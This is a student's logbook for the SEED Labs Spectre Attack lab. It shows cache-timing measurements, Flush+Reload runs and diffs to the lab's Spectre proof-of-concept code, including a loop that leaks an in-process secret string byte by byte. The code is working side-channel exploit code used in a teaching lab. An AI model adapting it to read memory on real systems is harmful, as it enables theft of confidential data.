# Logbook for Spectre Attack

## Task 1: Reading from Cache versus from Memory
First step is to compile `CacheTime.c` and execute to verify if we can spot the
difference between a cache hit and a cache miss:

```bash
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  gcc CacheTime.c -o CacheTime
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./CacheTime 
Access time for array[0*4096]: 348 CPU cycles
Access time for array[1*4096]: 278 CPU cycles
Access time for array[2*4096]: 229 CPU cycles
Access time for array[3*4096]: 50 CPU cycles
Access time for array[4*4096]: 255 CPU cycles
Access time for array[5*4096]: 237 CPU cycles
Access time for array[6*4096]: 289 CPU cycles
Access time for array[7*4096]: 83 CPU cycles
Access time for array[8*4096]: 243 CPU cycles
Access time for array[9*4096]: 247 CPU cycles
```

As it can be seen above, lines 3 and 7 were significatly faster to load
indicating a *cache hit*.

## Task 2: Using Cache as a Side Channel
Using the default value for threshold and repeating 20 times, we get:

```bash
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  gcc FlushReload.c -o FlushReload
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
array[94*4096 + 1024] is in cache.
The Secret = 94.
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
array[94*4096 + 1024] is in cache.
The Secret = 94.
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
array[94*4096 + 1024] is in cache.
The Secret = 94.
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
array[94*4096 + 1024] is in cache.
The Secret = 94.
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
array[94*4096 + 1024] is in cache.
The Secret = 94.
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./FlushReload
```

We guessed 5 out of 20 times, or 25%. Though I was interested to know if we
could improve this rate.

For this, I changed the code to show how many array positions were loaded in
less than 200 cycles (threshold based on the results of task 1) and the time
needed to access the `secret` position (94):

```diff
--- ../../../../../seed-labs/category-hardware/Spectre_Attack/Labsetup/FlushReload.c	2022-09-22 14:59:16.686103688 -0300
+++ FlushReload.c	2022-10-27 13:14:49.437960400 -0300
@@ -8,7 +8,7 @@
 int temp;
 unsigned char secret = 94;
 /* cache hit time threshold assumed*/
-#define CACHE_HIT_THRESHOLD (80)
+#define CACHE_HIT_THRESHOLD (90)
 #define DELTA 1024
 
 void victim()
@@ -29,17 +29,22 @@
   int junk=0;
   register uint64_t time1, time2;
   volatile uint8_t *addr;
-  int i;
+  int i, count = 0;
   for(i = 0; i < 256; i++){
    addr = &array[i*4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
+   if (i == 94)
+	printf("array[%d*4096 + %d] access time is %ld.\n", i, DELTA, time2);
+   if (time2 > 200)
+	   count += 1;
    if (time2 <= CACHE_HIT_THRESHOLD){
 	printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
         printf("The Secret = %d.\n",i);
    }
   } 
+  printf("Nº of positions that took longer than 200 cycles to load: %d\n", count);
 }
 
 int main(int argc, const char **argv)
```

The result for 20 executions is below:

```bash
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  gcc FlushReload.c -o FlushReload
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 198.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 178.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 167.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 156.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 146.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 203.
Nº of positions that took longer than 200 cycles to load: 256
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 74.
array[94*4096 + 1024] is in cache.
The Secret = 94.
Nº of positions that took longer than 200 cycles to load: 246
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 156.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 168.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 37.
array[94*4096 + 1024] is in cache.
The Secret = 94.
Nº of positions that took longer than 200 cycles to load: 100
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 209.
Nº of positions that took longer than 200 cycles to load: 256
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 195.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 95.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 166.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 176.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 152.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 35.
array[94*4096 + 1024] is in cache.
The Secret = 94.
Nº of positions that took longer than 200 cycles to load: 130
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 75.
array[94*4096 + 1024] is in cache.
The Secret = 94.
Nº of positions that took longer than 200 cycles to load: 255
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 37.
array[94*4096 + 1024] is in cache.
The Secret = 94.
Nº of positions that took longer than 200 cycles to load: 110
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  ./FlushReload 
array[94*4096 + 1024] access time is 197.
Nº of positions that took longer than 200 cycles to load: 255
```

Using this method, it's possible to see that we can guess the secret 15 out of
20 times, or 75% of the time. Although we get 5 inclonclusive tests - in one of
them, all the loads took over 200 cycles, and in the other 4 more than one
position took less then 200 cycles.

## Task 3: Out-of-Order Execution and Branch Prediction
Running the `SpectreExperiment.c` with a `180` threshold results in the
guessing of the value (`97`) - most of the time:

```bash
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  gcc SpectreExperiment.c -o SpectreExperiment
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./SpectreExperiment 
 charles   main … 1  …  seed-labs  category-hardware  Spectre_Attack  1  ./SpectreExperiment 
array[97*4096 + 1024] is in cache.
The Secret = 97.
```

Eliminating the flush of `size` from cache results in failure. That's because
it remains in cache and we don't have a speculative execution while the cpu
waits.

Changing line for to `victim(i + 20);` also make the attack fail. That happens
because `i + 20` is greater than `size` so we're actually training the CPU to
not follow through the if statement in the speculative execution.

## Task 4: The Spectre Attack
Again, using `180` as threshold, we are able to find the secret most times.

```bash
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  gcc SpectreAttack.c -o SpectreAttack
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  ./SpectreAttack 
secret: 0x556827de1008 
buffer: 0x556827de3020 
index of secret (out of bound): -8216 
array[0*4096 + 1024] is in cache.
The Secret = 0().
array[83*4096 + 1024] is in cache.
The Secret = 83(S).
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  ./SpectreAttack 
secret: 0x5645a675c008 
buffer: 0x5645a675e020 
index of secret (out of bound): -8216 
array[0*4096 + 1024] is in cache.
The Secret = 0().
array[83*4096 + 1024] is in cache.
The Secret = 83(S).
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  ./SpectreAttack 
secret: 0x556da2b16008 
buffer: 0x556da2b18020 
index of secret (out of bound): -8216 
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  ./SpectreAttack 
secret: 0x55c580db4008 
buffer: 0x55c580db6020 
index of secret (out of bound): -8216 
array[0*4096 + 1024] is in cache.
The Secret = 0().
array[83*4096 + 1024] is in cache.
The Secret = 83(S).
 charles   main ↑ 1 … 9  …  seed-labs  category-hardware  Spectre_Attack  ./SpectreAttack 
secret: 0x55ba2f93b008 
buffer: 0x55ba2f93d020 
index of secret (out of bound): -8216 
array[0*4096 + 1024] is in cache.
The Secret = 0().
array[83*4096 + 1024] is in cache.
The Secret = 83(S).
```



## Task 5: Improve the Attack Accuracy
To use the statiscal method, the threshold had to be lowered to `100`.
Otherwise we we're getting false positives. Also, the wait didn't seem
to improve accuracy. The values 1, 10 and 100 were tested and didn't change
the results. One execution is shown below.

```bash
 charles   main ↑ 1 ✚ 1 … 10  …  seed-labs  category-hardware  Spectre_Attack  1  SIGTSTP  ./SpectreAttackImproved 
****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************
[1] 0	[2] 0	[3] 0	[4] 0	[5] 0	[6] 0	[7] 0	[8] 0	[9] 0	[10] 0	[11] 0	[12] 0	[13] 0	[14] 0	[15] 0	[16] 0	[17] 0	[18] 0	[19] 0	[20] 0	[21] 0	[22] 0	[23] 0	[24] 0	[25] 0	[26] 0	[27] 0	[28] 0	[29] 0	[30] 0	[31] 0	[32] 0	[33] 0	[34] 0	[35] 0	[36] 0	[37] 0	[38] 0	[39] 0	[40] 0	[41] 0	[42] 0	[43] 0	[44] 0	[45] 0	[46] 0	[47] 0	[48] 1	[49] 0	[50] 0	[51] 0	[52] 0	[53] 0	[54] 0	[55] 0	[56] 0	[57] 0	[58] 0	[59] 0	[60] 0	[61] 0	[62] 0	[63] 0	[64] 0	[65] 0	[66] 0	[67] 0	[68] 0	[69] 0	[70] 0	[71] 0	[72] 0	[73] 0	[74] 0	[75] 0	[76] 0	[77] 0	[78] 0	[79] 0	[80] 0	[81] 0	[82] 0	[83] 22	[84] 0	[85] 0	[86] 0	[87] 0	[88] 0	[89] 0	[90] 0	[91] 0	[92] 0	[93] 0	[94] 0	[95] 0	[96] 0	[97] 0	[98] 0	[99] 0	[100] 0	[101] 0	[102] 0	[103] 0	[104] 0	[105] 0	[106] 0	[107] 0	[108] 0	[109] 0	[110] 0	[111] 0	[112] 0	[113] 0	[114] 0	[115] 0	[116] 0	[117] 0	[118] 0	[119] 0	[120] 0	[121] 0	[122] 0	[123] 0	[124] 0	[125] 0	[126] 0	[127] 0	[128] 0	[129] 0	[130] 0	[131] 0	[132] 0	[133] 0	[134] 0	[135] 0	[136] 0	[137] 0	[138] 0	[139] 0	[140] 0	[141] 0	[142] 0	[143] 0	[144] 0	[145] 1	[146] 0	[147] 0	[148] 0	[149] 0	[150] 0	[151] 0	[152] 0	[153] 0	[154] 0	[155] 0	[156] 0	[157] 0	[158] 0	[159] 0	[160] 0	[161] 0	[162] 0	[163] 0	[164] 0	[165] 0	[166] 0	[167] 0	[168] 0	[169] 0	[170] 0	[171] 0	[172] 0	[173] 0	[174] 0	[175] 0	[176] 0	[177] 0	[178] 0	[179] 0	[180] 0	[181] 0	[182] 0	[183] 0	[184] 0	[185] 0	[186] 0	[187] 0	[188] 0	[189] 0	[190] 0	[191] 0	[192] 0	[193] 0	[194] 0	[195] 0	[196] 0	[197] 0	[198] 0	[199] 0	[200] 0	[201] 0	[202] 0	[203] 0	[204] 0	[205] 0	[206] 0	[207] 0	[208] 0	[209] 0	[210] 0	[211] 0	[212] 0	[213] 0	[214] 0	[215] 0	[216] 0	[217] 0	[218] 0	[219] 0	[220] 0	[221] 0	[222] 0	[223] 0	[224] 0	[225] 0	[226] 0	[227] 0	[228] 0	[229] 0	[230] 0	[231] 0	[232] 0	[233] 0	[234] 0	[235] 0	[236] 0	[237] 0	[238] 0	[239] 0	[240] 0	[241] 0	[242] 0	[243] 0	[244] 0	[245] 0	[246] 0	[247] 0	[248] 0	[249] 0	[250] 0	[251] 0	[252] 0	[253] 0	[254] 0	[255] 0	
Reading secret value at index -8232
The secret value is 83(S)
The number of hits is 22
```



## Task 6: Steal the Entire Secret String
Altering `SpectreAttackImproved.c` to print the complete string was a bit of
mixed bag. I wasn't able to extract the complete string and the best result was
`Segredo: S?me?Se?ret?Val?e??***???`.

The code basically rerun `SpectreAttackImproved.c` through the all `secret`. See snipet below.

```c
void spectreAttackIndex(int offset)
{
  int i, all_zeros = 1;
  uint8_t s;
  size_t index_beyond = (size_t)(secret - (char*)buffer) + offset;

  flushSideChannel();
  for(i=0;i<256; i++) scores[i]=0; 

  for (i = 0; i < 1000; i++) {
    printf("****");  // This seemly "useless" line is necessary for the attack to succeed
    spectreAttack(index_beyond);
    usleep(WAIT_USEC);
    reloadSideChannelImproved();
  }

  int max = 1;
  for (i = 1; i < 256; i++){
    if(scores[max] < scores[i]) {
      max = i;
      all_zeros = 0;
    }
  }

  printf("\nReading secret value at index %ld\n", index_beyond);
  printf("The secret value is %d(%c)\n", max, max);
  printf("The number of hits is %d\n", scores[max]);
  if (all_zeros | max < 33 | max > 127)
    inf_secret[offset] = '?';
  else
    inf_secret[offset] = max;
  printf("%d: %c\n", offset, inf_secret[offset]);
}

int main() {
  for(int i = 0; i < 25; i++) {
    spectreAttackIndex(i);
  }
  printf("Segredo: %s\n", inf_secret);
  return (0); 
}
```


## Conclusion
In this lab we explored the dangerous of side-channel attackes and we learned how to craft the Spectre attack.

## Code
Here, the diff between the original seed-labs provided code and my changes is shown

### Task 2: Using Cache as a Side Channel
```diff
--- ../../../../../seed-labs/category-hardware/Spectre_Attack/Labsetup/FlushReload.c	2022-09-22 14:59:16.686103688 -0300
+++ FlushReload.c	2022-10-27 13:14:49.437960400 -0300
@@ -8,7 +8,7 @@
 int temp;
 unsigned char secret = 94;
 /* cache hit time threshold assumed*/
-#define CACHE_HIT_THRESHOLD (80)
+#define CACHE_HIT_THRESHOLD (90)
 #define DELTA 1024
 
 void victim()
@@ -29,17 +29,22 @@
   int junk=0;
   register uint64_t time1, time2;
   volatile uint8_t *addr;
-  int i;
+  int i, count = 0;
   for(i = 0; i < 256; i++){
    addr = &array[i*4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
+   if (i == 94)
+	printf("array[%d*4096 + %d] access time is %ld.\n", i, DELTA, time2);
+   if (time2 > 200)
+	   count += 1;
    if (time2 <= CACHE_HIT_THRESHOLD){
 	printf("array[%d*4096 + %d] is in cache.\n", i, DELTA);
         printf("The Secret = %d.\n",i);
    }
   } 
+  printf("Nº of positions that took longer than 200 cycles to load: %d\n", count);
 }
 
 int main(int argc, const char **argv)
```

### Task 3: Out-of-Order Execution and Branch Prediction
```diff
--- ../../../../../seed-labs/category-hardware/Spectre_Attack/Labsetup/SpectreExperiment.c	2022-09-22 14:59:16.686103688 -0300
+++ SpectreExperiment.c	2022-10-27 13:54:26.215558215 -0300
@@ -4,7 +4,7 @@
 #include <stdio.h>
 #include <stdint.h>
 
-#define CACHE_HIT_THRESHOLD (80)
+#define CACHE_HIT_THRESHOLD (180)
 #define DELTA 1024
 
 int size = 10;
@@ -55,7 +55,7 @@
 
   // Train the CPU to take the true branch inside victim()
   for (i = 0; i < 10; i++) {   
-      victim(i);
+      victim(i + 20);
   }
 
   // Exploit the out-of-order execution
```

### Task 4: The Spectre Attack
```diff
--- ../../../../../seed-labs/category-hardware/Spectre_Attack/Labsetup/SpectreAttack.c	2022-09-22 14:59:16.686103688 -0300
+++ SpectreAttack.c	2022-11-01 13:36:37.492698959 -0300
@@ -6,12 +6,12 @@
 
 unsigned int bound_lower = 0;
 unsigned int bound_upper = 9;
-uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
+uint8_t buffer[10] = {11,1,2,3,4,5,6,7,8,9}; 
 char    *secret    = "Some Secret Value";   
 uint8_t array[256*4096];
 
-#define CACHE_HIT_THRESHOLD (80)
-#define DELTA 1024
+#define CACHE_HIT_THRESHOLD (180)
+#define DELTA 4096
 
 // Sandbox Function
 uint8_t restrictedAccess(size_t x)
```

### Task 5: Improve the Attack Accuracy
```diff
--- ../../../../../seed-labs/category-hardware/Spectre_Attack/Labsetup/SpectreAttackImproved.c	2022-09-22 14:59:16.686103688 -0300
+++ SpectreAttackImproved.c	2022-11-01 14:11:16.374995533 -0300
@@ -8,13 +8,14 @@
 
 unsigned int bound_lower = 0;
 unsigned int bound_upper = 9;
-uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
+uint8_t buffer[10] = {23,1,2,3,4,5,6,7,8,9}; 
 uint8_t temp    = 0;
 char    *secret = "Some Secret Value";   
 uint8_t array[256*4096];
 
-#define CACHE_HIT_THRESHOLD (80)
-#define DELTA 1024
+#define CACHE_HIT_THRESHOLD (100)
+#define DELTA 3072
+#define WAIT_USEC (1)
 
 // Sandbox Function
 uint8_t restrictedAccess(size_t x)
@@ -38,7 +39,7 @@
 static int scores[256];
 void reloadSideChannelImproved()
 {
-int i;
+  int i;
   volatile uint8_t *addr;
   register uint64_t time1, time2;
   int junk = 0;
@@ -85,18 +86,18 @@
   for(i=0;i<256; i++) scores[i]=0; 
 
   for (i = 0; i < 1000; i++) {
-    printf("*****\n");  // This seemly "useless" line is necessary for the attack to succeed
+    fprintf(stderr, "****");  // This seemly "useless" line is necessary for the attack to succeed
     spectreAttack(index_beyond);
-    usleep(10);
+    usleep(WAIT_USEC);
     reloadSideChannelImproved();
   }
 
-  int max = 0;
-  for (i = 0; i < 256; i++){
+  int max = 1;
+  for (i = 1; i < 256; i++){
     if(scores[max] < scores[i]) max = i;
   }
 
-  printf("Reading secret value at index %ld\n", index_beyond);
+  printf("\nReading secret value at index %ld\n", index_beyond);
   printf("The secret value is %d(%c)\n", max, max);
   printf("The number of hits is %d\n", scores[max]);
   return (0);
```

### Task 6: Steal the Entire Secret String
```diff
--- SpectreAttackImproved.c	2022-11-01 14:11:16.374995533 -0300
+++ SpectreAttackImprovedComplete.c	2022-11-01 14:44:44.656648319 -0300
@@ -6,16 +6,17 @@
 #include <unistd.h>
 
 
+char    inf_secret[30];
 unsigned int bound_lower = 0;
 unsigned int bound_upper = 9;
-uint8_t buffer[10] = {23,1,2,3,4,5,6,7,8,9}; 
+uint8_t buffer[10] = {0,1,2,3,4,5,6,7,8,9}; 
 uint8_t temp    = 0;
 char    *secret = "Some Secret Value";   
 uint8_t array[256*4096];
 
-#define CACHE_HIT_THRESHOLD (100)
-#define DELTA 3072
-#define WAIT_USEC (1)
+#define CACHE_HIT_THRESHOLD (111)
+#define DELTA 1024
+#define WAIT_USEC (10)
 
 // Sandbox Function
 uint8_t restrictedAccess(size_t x)
@@ -77,16 +78,17 @@
   array[s*4096 + DELTA] += 88;
 }
 
-int main() {
-  int i;
+void spectreAttackIndex(int offset)
+{
+  int i, all_zeros = 1;
   uint8_t s;
-  size_t index_beyond = (size_t)(secret - (char*)buffer);
+  size_t index_beyond = (size_t)(secret - (char*)buffer) + offset;
 
   flushSideChannel();
   for(i=0;i<256; i++) scores[i]=0; 
 
   for (i = 0; i < 1000; i++) {
-    fprintf(stderr, "****");  // This seemly "useless" line is necessary for the attack to succeed
+    printf("****");  // This seemly "useless" line is necessary for the attack to succeed
     spectreAttack(index_beyond);
     usleep(WAIT_USEC);
     reloadSideChannelImproved();
@@ -94,11 +96,26 @@
 
   int max = 1;
   for (i = 1; i < 256; i++){
-    if(scores[max] < scores[i]) max = i;
+    if(scores[max] < scores[i]) {
+      max = i;
+      all_zeros = 0;
+    }
   }
 
   printf("\nReading secret value at index %ld\n", index_beyond);
   printf("The secret value is %d(%c)\n", max, max);
   printf("The number of hits is %d\n", scores[max]);
+  if (all_zeros | max < 33 | max > 127)
+    inf_secret[offset] = '?';
+  else
+    inf_secret[offset] = max;
+  printf("%d: %c\n", offset, inf_secret[offset]);
+}
+
+int main() {
+  for(int i = 0; i < 25; i++) {
+    spectreAttackIndex(i);
+  }
+  printf("Segredo: %s\n", inf_secret);
   return (0); 
 }
```
